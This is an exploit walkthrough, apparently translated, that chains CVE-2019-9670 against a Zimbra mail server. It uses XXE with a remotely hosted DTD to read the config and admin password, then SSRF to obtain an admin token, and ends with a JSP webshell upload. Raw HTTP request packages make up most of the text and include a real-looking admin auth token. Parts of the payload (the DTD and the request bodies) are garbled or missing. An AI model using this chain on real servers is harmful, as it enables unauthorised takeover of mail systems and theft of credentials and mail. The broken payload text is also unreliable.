Step 1: read the configuration file with xxE
Cve-2019-9670 vulnerability is exploited here to read the configuration file. You need to place a DTD file on your VPS server and make the file accessible through HTTP. For demonstration, I created a warehouse on GitHub to get DTD files from GitHub.
In the above figure, the password of Zimbra account is circled in red box, which will be used after being written down.
DTD file contents are as follows:
1
2
3 ">
4 "> The post request package is as follows:
POST /Autodiscover/Autodiscover.xml HTTP/1.1
Host: mail.****.com
User-Agent: Mozilla/5.0 (Windows NT 10.0;) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://mail.****.com/zimbra/
Content-Type: application/soap+xml
Content-Length: 436
Connection: close
Cookie: ZM_TEST=true
Upgrade-Insecure-Requests: 1
%dtd;
%all;
]>
aaaaa
&fileContents;Step 2: get low permission token
It can be seen from the above figure that a token has been obtained, but it is not an administrator’s token. It will be used later after being recorded temporarily.
The post request package is as follows:
POST /service/soap HTTP/1.1
Host: mail.****.com
User-Agent: Mozilla/5.0 (Windows NT 10.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://mail.****.com/zimbra/
Content-Type: application/soap+xml
Content-Length: 467
Connection: close
Cookie: ZM_TEST=true
Upgrade-Insecure-Requests: 1
zimbra
GzXaU76_s5Step 3: use SSRF to obtain admin permission token
Add the low permission token obtained in the previous step to the cookie, change xmlns = “urn: zimpraaccount” to xmlns = “urn: zimpraadmin”, add “: 7071” at the end of the host field, and use HTTPS protocol for the target in the URL. Then send the request to get the token of admin permission.
The post request package is as follows:
POST /service/proxy?target=https://127.0.0.1:7071/service/admin/soap HTTP/1.1
Host: mail.****.com:7071
User-Agent: Mozilla/5.0 (Windows NT 10.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://mail.****.com/zimbra/
Content-Type: application/soap+xml
Content-Length: 465
Connection: close
Cookie: ZM_ADMIN_AUTH_TOKEN=0_5221766f264e4dcb78b4f67be5f839b1ed668da3_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313535343733303133353638333b747970653d363a7a696d6272613b7469643d393a3735353034333637323b
Upgrade-Insecure-Requests: 1
zimbra
GzXaU76_s5Step 4: upload webshell
Add the admin permission token obtained in the previous step to the cookie, and then upload webshell.
The webshell path is / downloads / k4x6p.jsp. To access the webshell, you need to add admin_token to the cookie.
You can use this webshell to create a colt that can be connected with a kitchen knife in other directories that can be accessed without a cookie.
I mainly did some sorting work, thank you for the analysis articles written by the big guys on the Internet.
Reference link:
https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html
https://blog.csdn.net/fnmsd/article/details/88657083
http://www.cnvd.org.cn/flaw/show/CNVD-2019-07448
http://www.cnvd.org.cn/flaw/download?cd=20f07bbf4fc4769b606a52a0d14f79dd